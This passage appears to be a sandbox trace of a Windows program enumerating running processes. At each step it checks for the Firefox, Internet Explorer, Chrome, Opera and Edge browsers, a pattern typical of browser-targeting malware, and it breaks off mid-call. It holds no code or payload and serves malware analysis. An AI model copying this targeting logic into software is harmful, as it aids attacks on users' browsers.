[0244.404] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0244.405] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0244.405] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0244.405] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0244.405] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.405] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0244.405] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0244.405] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0244.405] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0244.405] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0244.405] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.405] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0244.406] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0244.406] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0244.406] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0244.406] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0244.406] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.406] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0244.406] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0244.406] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0244.406] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0244.406] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0244.406] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.406] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.407] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.407] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.408] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.408] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.408] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.408] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.408] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.408] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.408] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.409] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.409] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.409] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0244.410] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0244.410] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0244.410] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0244.410] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0244.410] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.410] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.410] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.410] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.410] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.410] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.410] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.411] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.411] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.411] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.411] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.411] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.411] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.411] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0244.412] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0244.412] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0244.412] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0244.412] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0244.412] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.412] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0244.412] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0244.412] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0244.412] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0244.412] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0244.412] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.412] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0244.413] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0244.413] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0244.413] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0244.413] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0244.413] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.413] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.413] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.413] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.413] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0244.413] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0244.414] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0244.414] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0244.414] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0244.414] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0244.414] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0244.415] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0244.415] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0244.415] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0244.415] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0244.415] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0244.415] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0244.415] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0244.415] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0244.415] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0244.415] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0244.416] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0244.416] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0244.416] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0244.416] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0244.416] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0244.416] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0244.416] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0244.416] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0244.416] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0244.416] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0244.417] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0244.417] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0244.417] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0244.417] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0244.417] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0244.418] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0244.418] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0244.418] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0244.418] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0244.418] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0244.418] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0244.418] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0244.418] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0244.418] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0244.418] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0244.419] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0244.419] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0244.419] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0244.419] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0244.419] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0244.419] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0244.419] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0244.419] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0244.419] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0244.419] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0244.420] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0244.420] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0244.420] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0244.420] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0244.420] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.420] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0244.420] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0244.420] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0244.421] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0244.421] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0244.421] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0244.421] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0244.421] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0244.421] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0244.421] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0244.421] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0244.422] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0244.422] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0244.422] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0244.422] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0244.422] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.422] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0244.422] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0244.422] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0244.422] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0244.422] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0244.422] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.422] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0244.423] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0244.423] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0244.423] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0244.423] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0244.423] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0244.423] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0244.423] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0244.423] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0244.423] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0244.423] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0244.424] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0244.424] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0244.424] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0244.424] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0244.424] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0244.425] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0244.425] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0244.425] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0244.425] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0244.425] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.425] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0244.425] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0244.425] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0244.425] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0244.425] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0244.425] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.425] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0244.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0244.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0244.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0244.426] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0244.426] lstrcmpiA (lpString1="doctrine alcohol.exe", 